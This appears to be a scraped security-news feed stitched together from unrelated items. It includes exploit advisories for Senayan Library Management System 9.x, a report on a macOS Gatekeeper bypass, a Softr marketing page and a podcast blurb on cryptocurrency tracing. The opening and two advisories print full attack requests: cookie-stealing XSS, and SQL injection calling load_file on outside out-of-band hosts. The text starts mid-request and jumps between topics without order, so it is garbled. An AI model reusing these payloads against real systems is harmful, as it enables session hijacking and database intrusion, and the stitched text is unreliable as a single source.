/slims9_bulian-9.2.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%22%3e%0a%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=o6o88hktpej7qdtu621h58q16q; admin_logged_in=1Connection: closeContent-Length: 2```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1)## Proof and Exploit:[href](https://streamable.com/i20ipf)## Time spent`01:35:00`

Senayan Library Management System 9.2.1 Cross Site Scripting

Microsoft has disclosed details of a now-patched security flaw in Apple macOS that could be exploited by an attacker to get around security protections imposed to prevent the execution of malicious applications.
The shortcoming, dubbed Achilles (CVE-2022-42821, CVSS score: 5.5), was addressed by the iPhone maker in macOS Ventura 13, Monterey 12.6.2, and Big Sur 11.7.2, describing it as a logic

Endpoint Security / Vulnerability

Microsoft has disclosed details of a now-patched security flaw in Apple macOS that could be exploited by an attacker to get around security protections imposed to prevent the execution of malicious applications.

The shortcoming, dubbed **Achilles** (CVE-2022-42821, CVSS score: 5.5), was addressed by the iPhone maker in macOS Ventura 13, Monterey 12.6.2, and Big Sur 11.7.2, describing it as a logic issue that could be weaponized by an app to circumvent Gatekeeper checks.

"Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS," Jonathan Bar Or of the Microsoft 365 Defender Research Team said.

Gatekeeper is a security mechanism designed to ensure that only trusted apps run on the operating system. This is enforced by means of an extended attribute called "com.apple.quarantine" that's assigned to files downloaded from the internet. It is analogous to the Mark of the Web (MotW) flag in Windows.

Thus when an unsuspecting user downloads a potentially harmful app that impersonates a piece of legitimate software, the Gatekeeper feature prevents the apps from being run as it's not validly signed and notarized by Apple.

Even in instances where an app is approved by Apple, users are displayed a prompt when it's launched for the first time to seek their explicit consent.

Given the crucial role played by Gatekeeper in macOS, it's hard not to imagine the consequences of sidestepping the security barrier, which could effectively permit threat actors to deploy malware on the machines.

The Achilles vulnerability identified by Microsoft exploits a permission model called Access Control Lists (ACLs) to add extremely restrictive permissions to a downloaded file (i.e., "everyone deny write,writeattr,writeextattr,writesecurity,chown"), thereby blocking Safari from setting the quarantine extended attribute.

In a hypothetical attack scenario, an adversary could embrace the technique to craft a rogue app and host it on a server, which could then be delivered to a possible target via social engineering, malicious ads, or a watering hole.

The method also circumvents Apple's newly introduced Lockdown Mode in macOS Ventura – an opt-in restrictive setting to counter zero-click exploits – necessitating that users apply the latest updates to mitigate threats.

"Fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks," Bar Or said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Details Gatekeeper Bypass Vulnerability in Apple macOS Systems

Softr v2.0 was discovered to be vulnerable to HTML injection via the Name field of the Account page.

**Build custom apps for your business, as easy as lego**

|

Turn your Airtable or Google Sheets into client portals, partner apps or internal tools.

**Trusted by 80,000+ teams worldwide**

**Create apps powered by your data**

**Client Portals**

Create client or employee portals with self-service account creation and secure access to content.

**Internal Tools**

Enable your team to create internal apps like employee directories, CRM, and company wikis, in minutes.

**Marketplaces**

Create two sided marketplaces like Airbnb, Upwork and the like. Sell services, goods, pay securely with Stripe and run your entire business from one tool.

**Online Communities**

Supercharge your community and bring them together in one platform, with memberships, free and premium content. Share resources, sell courses, connect with each other and more.

**Resource Directories**

Curate resources of any kind and let users search, filter, and explore. Launch online courses, company wikis or upvoting sites directly from Airtable.

**Websites**

Quickly create multi-page marketing sites or high-converting landing pages. Add your custom domain for free.

**Softr is the easiest, fastest way to build a professional web app on Airtable. Zero learning curve.**

**80,000+ companies and creators use Softr**

I had already tried other tools, so when I started using Softr, it was clear immediately that the capabilities were beyond what I found elsewhere.

**Yohei Nakajima**

General Partner, Untapped Capital

Softr helps you take action on your ideas quickly by allowing you to leverage your Airtable data and build powerful websites and web apps. I was blown away by how user-friendly and well-documented the entire product was! I was able to create an app within hours without any external help.

**Karthik Puvvada (KP)**

Program Director, On Deck No-Code Fellowship

Softr’s ease and speed of use is it’s standout characteristic. No tool is faster to create with. Although there is limited design customizability, this should be viewed as a strength of Softr as it acts as a positive restraint to help you ship things more quickly than you ordinarily would.

**Max Haining**

Founder, 100DaysOfNoCode

They say that if you can’t explain it in a simple way, you don’t understand it well enough. I say the same thing about any software. If you can’t figure it out in the first 10 min by yourself without any tutorial, it’s probably not for you. Since the first moment we discovered Softr, we started the work.

**Akiki Rachid**

COO, Bookzdoctr Inc

It took me one day to build the product, learn the integrations, and see how the customer service acts. I was completely flashed that it is so easy, and that everything is working really well. So, I quickly decided 3 weeks later to set up our main page and transferred it to Softr.

**Sabine Wildemann**

Co-Founder, KidsCircle

I have been impressed with the flexibility of Softr. The ability to pull data from different Airtable bases into different blocks and display them on one page was one of the main reasons I chose Softr.

**Dan Smith**

Director, DS Automotive

As a small business, we needed to use a tool that could grow with us, and we feel that this is what Softr offers us. After wasting time and money trying every web builder under the sun, Softr came to save the day. We cannot recommend this platform enough – it's perfect, easy to use even for a non-technical person like me.

**Lucia Borraccino**

Founder, Nanny Network

I like the diversity of templates that are available and the thoughtfulness that has been taken in making the building process as simple as possible for non-coders.

**Kwaku Dapaah-Danquah**

Entrepreneurship Manager, YSYS

I used Softr to build the MVP for my company www.tallsize.com.When I discovered how easy it was to use Softr to create a frontend interface for our users, my mind was blown!!! It was so easy to set up that I literally launched my site in a single weekend. Their support team was incredible throughout this journey and the ability to customize everything the way I wanted was very intuitive and easy to accomplish.

**Nicole Murphy**

Founder, Tall Size

I have been using Softr for a few months now, and the list of new features & improvements is PHENOMENAL. A no-brainer pick for now and a really good bet for the future!

**Nic Touron**

Founder, ToolMeUp

With Softr, I’m able to create beautifully intuitive and responsive front-ends that integrate directly with Airtable and Stripe. Softr allows me to create and iterate at least twice as fast as traditional web platforms.

**Connor Gustafson**

Founder, LendingApp

Softr is THE no-code website builder to use. From SEO and site responsiveness to database backends and customer support, Softr is the deal of the century!

**Patrick Ford**

Founder, Adastacks

**Simple, yet powerful**

**As simple as building lego**

Start from a template or from 100+ pre-built blocks and customize any element on the page. No design or coding skills needed.

**Build platforms, not just sites**

Turn your Airtable data into a full-stack web-app with out-of-the-box memberships, payments and business logic, all in one place.

**Turn into a mobile app, with one click**

Immediately made available on both Apple and Android devices, without the extra effort.

**Start now, go live today**

Don't spend hours learning new tools. Softr is the quickest way to put a product in the hands of your customers. Changing things later is easy and instant.

**This website is built on Softr**

Join 80,000+ companies already using Softr.

**Powerful pre-built functionality out of the box**

Softr does the heavy lifting of all technical work for you, so you can focus on your business.

**Secure user accounts**

Keep yours and your customers' data safe with server-side password protection.

**Free custom domain**

Our free tier includes hosting on custom domains. No credit card required.

**Team Collaboration**

Invite your teammates to manage the application and set granular permissions

**Easy online payments**

Enable one-off purchases or subscriptions in seconds.

**Optimized for SEO**

Pages built with Softr are automatically indexed by search engines.

**Performant, safe, and scalable**

Enjoy Amazon AWS-powered security and performance.

**Integrate with the tools you love**

Seamlessly integrate your Softr app with the modern and trusted tools of your workflow like Zapier, Google Analytics, Stripe, Hotjar, Mailchimp and more.

**Run your business on Softr + Airtable**

**For Companies**

Explore how SMBs and startups use Softr to manage and grow their business.

LEARN MORE

**For Creators**

Learn how entrepreneurs of all sizes are starting new ventures in days with Softr.

LEARN MORE

**For Non-Profits**

Organizations of all kinds can run their operations online, saving time and money.

**Learn about companies and creators using Softr**

CVE-2022-40434: Build website, web app & portals on Airtable without code | Softr

Senayan Library Management System version 9.2.0 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.19.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit anvery dangerous web page ot malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.0/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%62%62%62%62%27%2b%28%73%65%6c%65%63%74%20%6c%6f%61%64%5f%66%69%6c%65%28%27%5c%5c%5c%5c%37%31%36%67%62%31%63%66%65%39%67%6b%6a%61%34%7a%64%6a%34%35%71%78%78%39%32%30%38%76%77%6c%6b%63%6e%30%65%6e%36%62%76%2e%73%6c%69%6d%73%2e%77%65%62%2e%69%64%5c%5c%6e%62%71%27%29%29%2b%27%74%38%78%71%76%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%67%69%70%68%79%2e%63%6f%6d%2f%6d%65%64%69%61%2f%62%54%42%79%75%74%61%6d%4a%53%6a%68%53%2f%67%69%70%68%79%2e%67%69%66%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e%3c%2f%73%63%72%69%70%74%3e%75%6f%75%32%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=i6ml8c8i4dmi37vtcpnnf9jhm9; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0)## Proof and Exploit:[href](https://streamable.com/5smxxm)## Time spent`02:35:00`

Senayan Library Management System 9.2.0 Cross Site Scripting

Senayan Library Management System version 9.1.1 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 XSS-Reflected - PHPSESSID Hijacking + inserting webp image## Author: nu11secur1ty## Date: 12.17.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.1.1## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1## Description:The value of the `class` request parameter is copied into the HTMLdocument as plain text between tags.The payload ytrrh<script>alert(1)</script>z3nj2 was submitted in theclass parameter. This input was echoed unmodified in the application'sresponse.The attacker can trick some authenticated user to visit his page andgive to him very sensitive information about the system.## STATUS: HIGH Vulnerability[+] Payloads:0.0```GETGET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=nu11secur1ty<script>alert(document.cookie)</script>&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1Connection: close```0.1```GETGET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%72%61%77%2e%67%69%74%68%75%62%75%73%65%72%63%6f%6e%74%65%6e%74%2e%63%6f%6d%2f%6e%75%31%31%73%65%63%75%72%31%74%79%2f%58%53%53%69%67%68%74%2f%6d%61%73%74%65%72%2f%58%53%53%2d%69%6d%61%67%65%2f%69%6d%61%67%65%2f%6b%6f%73%74%61%61%6b%61%74%69%6c%2e%77%65%62%70%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1)## Proof and Exploit:[href](https://streamable.com/ibdulr)## Time spent`01:30:00`

Senayan Library Management System 9.1.1 Cross Site Scripting

Categories: Podcast
This week on Lock and Code, we learn about how investigators actually track illicit cryptocurrency payments through cyberspace after they've already been exchanged as part of a crime. 



(Read more...)




The post Chasing cryptocurrency through cyberspace, with Brian Carter: Lock and Code S03E26 appeared first on Malwarebytes Labs.

Posted: December 19, 2022 by

On June 7, 2021, the US Department of Justice announced a breakthrough: Less than one month after the oil and gas pipeline company Colonial Pipeline had paid its ransomware attackers roughly $4.4 million in bitcoin in exchange for a decryption key that would help the company get its systems back up and running, the government had in turn found where many of those bitcoins had gone, clawing back a remarkable $2.3 million from the cybercriminals.

In cybercrime, this isn't supposed to happen—or at least it wasn't, until recently. 

Cryptocurrency is vital to modern cybercrime. Every recent story you hear about a major ransomware attack involves the implicit demand from attackers to their victims for a payment made in cryptocurrency—and, almost always, the preferred cryptocurrency is bitcoin. In 2019, the ransomware negotiation and recovery company Coveware revealed that a full 98 percent of ransomware payments were made using bitcoin.

Why is that? Well, partly because, for years, bitcoin received an inflated reputation for being truly "anonymous," as payments to specific "bitcoin addresses" could not, seemingly, be attached to specific persons behind those addresses. But cryptocurrency has matured. Major cryptocurrency exchanges do not want their platforms to be used to exchange stolen funds into local currencies for criminals, so they, in turn, work with law enforcement agencies that have, independently, gained a great deal of experience in understanding cybercrime. Improving the rate and quality of investigations has also been the advancement of technology that actually tracks cryptocurrency payments online. 

All of these development don't necessarily mean that cybercriminals' identities can be easily revealed. But as Brian Carter, senior cybercrimes specialist for Chainalysis, explains on today's episode, it has become easier for investigators to know who is receiving payments, where they're moving it to, and even how their criminal organizations are set up.

> "We will plot a graph, like a link graph, that shows \[a victim's\] payment to the address provided by ransomware criminals, and then that payment will split among the members of the crew, and then those payments will end up going eventually to a place where it'll be cashed out for something that they can use on their local economy."

Tune in to today's Lock and Code podcast, with host David Ruiz, to learn about the world of cryptocurrency forensics, what investigators are looking for in reams of data, how they find it, and why it’s so hard. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

**RELATED ARTICLES**

Tag

#apple